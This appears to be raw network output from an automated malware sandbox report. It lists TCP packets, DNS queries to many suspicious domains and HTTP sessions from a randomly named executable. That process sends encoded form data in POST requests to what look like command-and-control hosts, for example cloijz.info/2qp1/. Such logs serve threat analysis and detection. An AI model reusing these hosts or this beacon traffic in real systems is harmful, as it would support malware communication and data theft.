                                                            Dec 16, 2024 22:05:44.429008007 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:45.361758947 CET5001880192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:45.485157013 CET8050018156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:45.485249043 CET5001880192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:45.495820999 CET5001880192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:45.617065907 CET8050018156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:47.024296045 CET8050018156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:47.024322033 CET8050018156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:47.024470091 CET5001880192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:47.027751923 CET5001880192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:47.148657084 CET8050018156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:53.114974976 CET5001980192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:53.235243082 CET8050019162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:53.235353947 CET5001980192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:53.252780914 CET5001980192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:53.372682095 CET8050019162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:54.453658104 CET8050019162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:54.453819036 CET8050019162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:54.456999063 CET5001980192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:54.760932922 CET5001980192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:55.776563883 CET5002080192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:55.899605989 CET8050020162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:55.899697065 CET5002080192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:55.914433002 CET5002080192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:56.034396887 CET8050020162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:57.123580933 CET8050020162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:57.123631001 CET8050020162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:57.123683929 CET5002080192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:57.429461002 CET5002080192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:58.448146105 CET5002180192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:58.572544098 CET8050021162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:58.572793961 CET5002180192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:58.590945005 CET5002180192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:05:58.711685896 CET8050021162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:58.712629080 CET8050021162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:59.807454109 CET8050021162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:59.807595015 CET8050021162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:05:59.807796001 CET5002180192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:00.101622105 CET5002180192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:01.120462894 CET5002280192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:01.241095066 CET8050022162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:06:01.241192102 CET5002280192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:01.251311064 CET5002280192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:01.371364117 CET8050022162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:06:02.458425999 CET8050022162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:06:02.458663940 CET8050022162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:06:02.459434032 CET5002280192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:02.461905956 CET5002280192.168.2.5162.218.30.235
                                                            Dec 16, 2024 22:06:02.583252907 CET8050022162.218.30.235192.168.2.5
                                                            Dec 16, 2024 22:06:07.926820993 CET5002380192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:08.046755075 CET8050023109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:08.051234961 CET5002380192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:08.205293894 CET5002380192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:08.325191021 CET8050023109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:09.354762077 CET8050023109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:09.354809046 CET8050023109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:09.354944944 CET5002380192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:09.804724932 CET5002380192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:10.823600054 CET5002480192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:10.943490028 CET8050024109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:10.943579912 CET5002480192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:10.960270882 CET5002480192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:11.083010912 CET8050024109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:12.253089905 CET8050024109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:12.253371000 CET8050024109.206.161.15192.168.2.5
                                                            Dec 16, 2024 22:06:12.261079073 CET5002480192.168.2.5109.206.161.15
                                                            Dec 16, 2024 22:06:12.773366928 CET5002480192.168.2.5109.206.161.15
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 16, 2024 22:02:35.865933895 CET6443653192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:02:36.409801960 CET53644361.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:02:52.922457933 CET6480653192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:02:53.466252089 CET53648061.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:03:08.871027946 CET6058053192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:03:09.419564962 CET53605801.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:03:24.933471918 CET6222253192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:03:25.804557085 CET53622221.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:03:40.155361891 CET5814653192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:03:40.709146023 CET53581461.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:03:56.183470964 CET4930953192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:03:56.593647003 CET53493091.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:04:11.386856079 CET5819053192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:04:12.383352041 CET5819053192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:04:12.809654951 CET53581901.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:04:12.809740067 CET53581901.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:04:27.557892084 CET5897453192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:04:27.942457914 CET53589741.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:04:42.308856010 CET5950653192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:04:42.964025021 CET53595061.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:04:51.026911020 CET5772553192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:04:51.572871923 CET53577251.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:05:07.039343119 CET5485953192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:05:07.564194918 CET53548591.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:05:21.793814898 CET6487453192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:05:22.294512033 CET53648741.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:05:36.560905933 CET6037553192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:05:37.313245058 CET53603751.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:05:52.043154001 CET5791353192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:05:53.039331913 CET5791353192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:05:53.105807066 CET53579131.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:05:53.176404953 CET53579131.1.1.1192.168.2.5
                                                            Dec 16, 2024 22:06:07.480988026 CET6358153192.168.2.51.1.1.1
                                                            Dec 16, 2024 22:06:07.924302101 CET53635811.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 16, 2024 22:02:35.865933895 CET192.168.2.51.1.1.10x6f5bStandard query (0)www.did-ready.infoA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:02:52.922457933 CET192.168.2.51.1.1.10x9835Standard query (0)www.cloijz.infoA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:08.871027946 CET192.168.2.51.1.1.10xe355Standard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:24.933471918 CET192.168.2.51.1.1.10xff2dStandard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:40.155361891 CET192.168.2.51.1.1.10x4fadStandard query (0)www.xinchaocjcela.netA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:56.183470964 CET192.168.2.51.1.1.10xd784Standard query (0)www.telepzow.fitA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:11.386856079 CET192.168.2.51.1.1.10x2447Standard query (0)www.rpa.asiaA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:12.383352041 CET192.168.2.51.1.1.10x2447Standard query (0)www.rpa.asiaA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:27.557892084 CET192.168.2.51.1.1.10xde89Standard query (0)www.daildeals.storeA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:42.308856010 CET192.168.2.51.1.1.10x4093Standard query (0)www.apptj7.xyzA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:51.026911020 CET192.168.2.51.1.1.10x1cd2Standard query (0)www.mirenzhibo.netA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:07.039343119 CET192.168.2.51.1.1.10x4df7Standard query (0)www.panavet.netA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:21.793814898 CET192.168.2.51.1.1.10x5f36Standard query (0)www.sorket.techA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:36.560905933 CET192.168.2.51.1.1.10xb8b3Standard query (0)www.wuyyv4tq.topA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:52.043154001 CET192.168.2.51.1.1.10x2eb6Standard query (0)www.l40175.xyzA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:53.039331913 CET192.168.2.51.1.1.10x2eb6Standard query (0)www.l40175.xyzA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:06:07.480988026 CET192.168.2.51.1.1.10xa42cStandard query (0)www.asianoilporn.xyzA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 16, 2024 22:02:36.409801960 CET1.1.1.1192.168.2.50x6f5bNo error (0)www.did-ready.info194.245.148.189A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:02:53.466252089 CET1.1.1.1192.168.2.50x9835No error (0)www.cloijz.info47.83.1.90A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:09.419564962 CET1.1.1.1192.168.2.50xe355No error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:25.804557085 CET1.1.1.1192.168.2.50xff2dNo error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                                            Dec 16, 2024 22:03:25.804557085 CET1.1.1.1192.168.2.50xff2dNo error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:40.709146023 CET1.1.1.1192.168.2.50x4fadNo error (0)www.xinchaocjcela.net18.143.155.63A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:56.593647003 CET1.1.1.1192.168.2.50xd784No error (0)www.telepzow.fit104.21.64.208A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:03:56.593647003 CET1.1.1.1192.168.2.50xd784No error (0)www.telepzow.fit172.67.155.214A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:12.809654951 CET1.1.1.1192.168.2.50x2447No error (0)www.rpa.asia160.25.166.123A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:12.809740067 CET1.1.1.1192.168.2.50x2447No error (0)www.rpa.asia160.25.166.123A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:27.942457914 CET1.1.1.1192.168.2.50xde89No error (0)www.daildeals.store209.74.79.41A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:42.964025021 CET1.1.1.1192.168.2.50x4093Name error (3)www.apptj7.xyznonenoneA (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:04:51.572871923 CET1.1.1.1192.168.2.50x1cd2No error (0)www.mirenzhibo.net202.95.11.110A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:07.564194918 CET1.1.1.1192.168.2.50x4df7No error (0)www.panavet.net52.223.13.41A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:22.294512033 CET1.1.1.1192.168.2.50x5f36No error (0)www.sorket.tech199.59.243.227A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:37.313245058 CET1.1.1.1192.168.2.50xb8b3No error (0)www.wuyyv4tq.top156.226.63.13A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:53.105807066 CET1.1.1.1192.168.2.50x2eb6No error (0)www.l40175.xyz162.218.30.235A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:05:53.176404953 CET1.1.1.1192.168.2.50x2eb6No error (0)www.l40175.xyz162.218.30.235A (IP address)IN (0x0001)false
                                                            Dec 16, 2024 22:06:07.924302101 CET1.1.1.1192.168.2.50xa42cNo error (0)www.asianoilporn.xyz109.206.161.15A (IP address)IN (0x0001)false
                                                            • www.did-ready.info
                                                            • www.cloijz.info
                                                            • www.gayhxi.info
                                                            • www.promocao.info
                                                            • www.xinchaocjcela.net
                                                            • www.telepzow.fit
                                                            • www.rpa.asia
                                                            • www.daildeals.store
                                                            • www.mirenzhibo.net
                                                            • www.panavet.net
                                                            • www.sorket.tech
                                                            • www.wuyyv4tq.top
                                                            • www.l40175.xyz
                                                            • www.asianoilporn.xyz
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549754194.245.148.189802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:02:36.553023100 CET566OUTGET /bztr/?glL=+raX0WyLDYw8S+KRmoOtaFiRfySuxy85gg+Qzu5w0Ad1L/hVTfA6SqKbdvi+w2gMBWyH6yJFSUmTR0ZUJNCZeb91TbfwhQ6kNHH3J+lp18PT0J6Lm7L9P5Q9gRLrhFE3Rg==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.did-ready.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:02:37.816081047 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:02:37 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 1840
                                                            Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                            Connection: close
                                                            ETag: "58e3a61e-730"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 54 68 65 20 61 62 6f 76 65 20 33 20 6d 65 74 61 20 74 61 67 73 20 2a 6d 75 73 74 2a 20 63 6f 6d 65 20 66 69 72 73 74 20 69 6e 20 74 68 65 20 68 65 61 64 3b 20 61 6e 79 20 6f 74 68 65 72 20 68 65 61 64 20 63 6f 6e 74 65 6e 74 20 6d 75 73 74 20 63 6f 6d 65 20 2a 61 66 74 65 72 2a 20 74 68 65 73 65 20 74 61 67 73 20 2d 2d 3e 0a 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <meta name="description" content=""> <meta name="author" content=""> <meta http-equiv="refresh" content="5;url=/" /> <link rel="icon" href="../../favicon.ico"> <title>The requested page does not exist or is temporarily not available</title> ... Bootstrap core CSS --> <link href="./css/bootstrap.min.css" rel="stylesheet"> ... Custom styles for this template --> <link href="./css/parkingpage.css" rel="stylesheet"> </head> <body> <div class="container-fluid"> <div class="header clearfix"> <h3 class="text-muted"><img src="./images/JokerLogo2x.png"></h3> </div> </div><div class="
                                                            Dec 16, 2024 22:02:37.816122055 CET846INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 33 22 3e 34 30 34 20 2d 20 70 61 67 65
                                                            Data Ascii: container"> <div class="jumbotron"> <h1 class="display-3">404 - page not found</h1> <p class="lead">The page that you have requested may have moved or does not exist. Please check the URL for proper spelling and capitaliz


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54979547.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:02:53.603586912 CET820OUTPOST /2qp1/ HTTP/1.1
                                                            Host: www.cloijz.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.cloijz.info
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.cloijz.info/2qp1/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 76 43 33 49 34 55 65 31 2f 37 56 6a 65 44 66 71 51 62 4a 2f 32 50 51 58 6b 72 4f 59 79 31 6e 75 57 77 48 6b 2f 65 5a 71 63 30 4e 74 51 69 65 47 36 41 32 46 4e 75 2f 6e 33 41 38 32 75 77 43 4e 70 78 45 37 31 50 6f 75 59 44 6e 2f 30 4a 41 64 71 6e 4a 78 64 59 31 67 47 53 75 5a 43 74 6d 34 37 30 2b 35 6d 77 58 7a 52 64 4a 4a 45 74 6f 31 74 33 2f 63 65 56 67 71 6f 76 69 71 64 7a 39 43 67 4d 6f 56 4c 53 30 4e 44 70 74 38 67 74 65 4b 57 4d 54 66 55 35 38 59 4b 54 78 63 61 37 31 66 31 61 63 6c 77 68 37 77 48 76 74 56 51 77 42 61 49 6a 6f 69 65 46 36 46 65 35 38 42 69 6b 58 52 76 5a 4b 6f 2f 2b 49 3d
                                                            Data Ascii: glL=vC3I4Ue1/7VjeDfqQbJ/2PQXkrOYy1nuWwHk/eZqc0NtQieG6A2FNu/n3A82uwCNpxE71PouYDn/0JAdqnJxdY1gGSuZCtm470+5mwXzRdJJEto1t3/ceVgqoviqdz9CgMoVLS0NDpt8gteKWMTfU58YKTxca71f1aclwh7wHvtVQwBaIjoieF6Fe58BikXRvZKo/+I=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54980147.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:02:56.270107031 CET840OUTPOST /2qp1/ HTTP/1.1
                                                            Host: www.cloijz.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.cloijz.info
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.cloijz.info/2qp1/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 76 43 33 49 34 55 65 31 2f 37 56 6a 65 67 33 71 44 6f 52 2f 68 66 51 55 34 37 4f 59 6c 6c 6d 6e 57 77 62 6b 2f 61 68 63 63 6e 6c 74 51 47 61 47 35 42 32 46 4f 75 2f 6e 76 51 38 7a 67 51 44 50 70 78 59 7a 31 50 45 75 59 44 44 2f 30 49 77 64 71 30 78 32 50 59 31 69 65 69 75 62 66 64 6d 34 37 30 2b 35 6d 7a 71 57 52 5a 74 4a 45 64 59 31 75 57 2f 66 41 6c 67 31 2f 66 69 71 5a 7a 39 47 67 4d 6f 53 4c 57 30 6e 44 71 56 38 67 76 32 4b 57 59 50 59 62 35 38 65 41 7a 78 50 64 36 6b 53 31 62 6f 66 36 53 62 31 52 64 31 58 52 47 77 77 53 42 67 4b 4e 6c 57 39 4f 71 30 32 7a 55 32 34 31 36 61 59 68 70 66 58 55 38 32 48 47 4a 75 33 41 6b 53 75 4b 45 73 32 63 68 4e 67
                                                            Data Ascii: glL=vC3I4Ue1/7Vjeg3qDoR/hfQU47OYllmnWwbk/ahccnltQGaG5B2FOu/nvQ8zgQDPpxYz1PEuYDD/0Iwdq0x2PY1ieiubfdm470+5mzqWRZtJEdY1uW/fAlg1/fiqZz9GgMoSLW0nDqV8gv2KWYPYb58eAzxPd6kS1bof6Sb1Rd1XRGwwSBgKNlW9Oq02zU2416aYhpfXU82HGJu3AkSuKEs2chNg


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.54980747.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:02:58.924498081 CET1857OUTPOST /2qp1/ HTTP/1.1
                                                            Host: www.cloijz.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.cloijz.info
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.cloijz.info/2qp1/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 76 43 33 49 34 55 65 31 2f 37 56 6a 65 67 33 71 44 6f 52 2f 68 66 51 55 34 37 4f 59 6c 6c 6d 6e 57 77 62 6b 2f 61 68 63 63 6e 39 74 54 7a 4f 47 37 6d 69 46 50 75 2f 6e 6a 77 38 79 67 51 43 58 70 78 51 33 31 50 59 55 59 42 4c 2f 79 71 34 64 39 56 78 32 56 49 31 69 43 53 75 57 43 74 6e 36 37 31 54 77 6d 77 43 57 52 5a 74 4a 45 62 55 31 34 33 2f 66 43 6c 67 71 6f 76 69 6d 64 7a 38 68 67 4e 41 6b 4c 57 68 53 43 61 31 38 67 50 6d 4b 61 4e 54 59 57 35 38 63 44 7a 77 53 64 36 70 53 31 62 46 6b 36 54 75 61 52 66 6c 58 51 58 5a 4d 57 69 63 55 63 56 32 42 4c 6f 30 47 69 45 43 7a 74 6f 47 6f 69 35 54 69 51 74 2b 55 4b 76 69 51 41 77 4c 52 57 43 55 68 51 6b 63 7a 6c 7a 54 52 65 71 39 47 33 50 6d 6a 58 50 49 56 58 75 73 2f 4b 50 79 73 70 77 46 48 69 32 54 37 70 36 63 33 2f 6d 67 75 41 39 54 65 51 4e 39 52 6f 4f 74 35 79 5a 63 6c 53 56 55 43 31 33 4d 61 63 5a 48 4f 68 66 65 73 57 42 76 6a 7a 76 74 47 38 55 55 6f 31 65 45 4f 4e 69 63 78 74 71 6d 68 63 68 66 73 5a 34 4f 49 76 79 49 48 49 34 61 67 6f 5a [TRUNCATED]
                                                            Data Ascii: glL=vC3I4Ue1/7Vjeg3qDoR/hfQU47OYllmnWwbk/ahccn9tTzOG7miFPu/njw8ygQCXpxQ31PYUYBL/yq4d9Vx2VI1iCSuWCtn671TwmwCWRZtJEbU143/fClgqovimdz8hgNAkLWhSCa18gPmKaNTYW58cDzwSd6pS1bFk6TuaRflXQXZMWicUcV2BLo0GiECztoGoi5TiQt+UKviQAwLRWCUhQkczlzTReq9G3PmjXPIVXus/KPyspwFHi2T7p6c3/mguA9TeQN9RoOt5yZclSVUC13MacZHOhfesWBvjzvtG8UUo1eEONicxtqmhchfsZ4OIvyIHI4agoZjB1aatYDtwhzTffrOB6/h/QwfE01C4qF2AFoQuiuk0nDwLB6e2Zku6ucyzmlQYxN92L0PzNWr7CZ5maSZDn/wX8HGmHYcTwy2ok6Yo8tQsuBUbqbL4mZk0AddlDjiDmhuwhGl/b5DP8utofiYgtNj5QHNBR3fF3RsQoCUK5gqWoiLsOuhyUkrr30AAQG6WglzODnPGSvqk1mJZqVLMwdaxfw7teMEfJ9BX45pGLv8VbXp9tvk281RJfMAECBdV/Yqflm8oU1An++2Yk6ZhzQsRNouCZRcUpNwH79P1R3aSiuxxh1UrxNkTnMyCGe0xZ2GAnYiPoHiqHBDHBs0ohNuO93yNoR80uGvq15EwxpVvB0+b54AfJrbMmmNL/QXdpfYwZ1asewe5ZK3tpdiPvRK9s4/ZuJb/xviw9YXI0DX2JgHOz1e+H4k/cE5VmVmDXcGTvhCtIRhJu1NzxRbcXB+CwZOeKw2sajpheLgUuTVDveOFjF8l6r8wtTpuWPUJj22muD9L5U4LGGTW/V7BBAQNak/ok8xcEDsjvJvlSfWi2FFg3g0kv5SZmhAzGGCLeQEQ4QY3PAYP8t5LimOfPugp2qgo0bl9BXsWsK2F4FmCytEN5yGqfHk354u5RIDYdQnpd4VhphZrCooL0gyr41Rf6IRyEZG8dq9C [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.54981347.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
